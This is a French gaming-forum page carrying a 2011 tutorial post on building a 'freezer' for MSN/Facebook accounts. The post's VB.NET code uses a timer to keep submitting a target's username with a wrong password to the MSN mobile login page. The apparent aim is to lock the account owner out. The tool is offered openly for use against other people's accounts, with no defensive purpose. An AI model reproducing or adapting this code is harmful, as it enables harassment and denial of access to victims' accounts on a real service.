PsX-Games

Bienvenue sur le Forum PsX-Games !
Pour découvrir entièrement le forum, merci de t'inscrire et ensuite de te présenter, ensuite vous aurez accès a l'immensité du forum, contenant de nombreux tutoriels très utiles !

Passez un agréable moment sur PsX-Games ! Merci.

PS : le forum, suite a des plaintes de la firme forumactif, subira des modifications prochainement ... nettoyage de certains topics et suppression de certains sujet de hack auront lieux

Cordialement. Le STAFF De PsX-Games
PsX-Games

             Bienvenue a toi Invité , nous sommes le Dim 4 Déc - 12:15. Nous avons 8595 membres enregistrées, et le dernier utilisateur enregistré est enes7574, et nous lui souhaitons la bienvenue ! N’hésitez pas a modifier votre profil en cliquant sur : Invité Passez un agréable moment sur PsX-Games !
Suite à la maintenance du 09/07, toutes les présentations ont été supprimé. Je vous invite donc à allez vous re-présentez.
Suite à la maintenance du 09/07, toutes les présentations ont été supprimé. Je vous invite donc à allez vous re-présentez.

    [NewTuto]Créer un freezer ! [ Fb,Msn ]

    Partagez

    xFaNtAsTiiC.
    Habitué
    Habitué

    Messages : 102
    Réputation : 4
    Date d'inscription : 06/02/2011

    [NewTuto]Créer un freezer ! [ Fb,Msn ]

    Message par xFaNtAsTiiC. le Sam 2 Juil - 22:25

    Vous aurrez besoin de:

    -1 Webbrowser
    -2 boutons (1: Freeze, 2: Unfreez)
    -1 Timer

    Code:



    Au dessus de Public Class Form1 Rajouter:

    Code :
    Imports System.Threading.Thread

    Cliquer deux fois sur la form et mettez ce code:

    Code :
    WebBrowser1.Navigate("http://mobile.msn.com/hm/folder.phpx")

    Timer1 :

    Code :
    On Error GoTo errordetected WebBrowser1.document.GetElementById("LoginTextBox").SetAttribute("value", (TextBox1.Text)) WebBrowser1.document.GetElementById("PasswordTextBox").SetAttribute("value", ("pas13465")) WebBrowser1.document.GetElementById("PasswordSubmit").InvokeMember("click")
    GoTo done
    errordetected:
    WebBrowser1.Navigate("http://mobile.msn.com/hm/folder.phpx")
    done:

    Bouton1 : (Freeze)

    Code :
    Timer1.Start ()

    Bouton2: (Unfreeze)

    Code :
    Timer1.Stop ()


    Vous avez enfin finis votre frizeur ! +
    1 ?[/b] Smile[/b]

    +1 .?



    ---------------------------------
    ---------------------------------

    Cordialement ,

    xFaNtAsTiiC.
    Modérateur de PsX


    -xBox Live : Non
    -Skype : Non
    -Msn : Oui
    -PSN : Oui
    -GameCenter : Oui

    ---Appareil---

    iPod touch 4G

    ---Console---

    Playstation 3
    PSP

      La date/heure actuelle est Dim 4 Déc - 12:15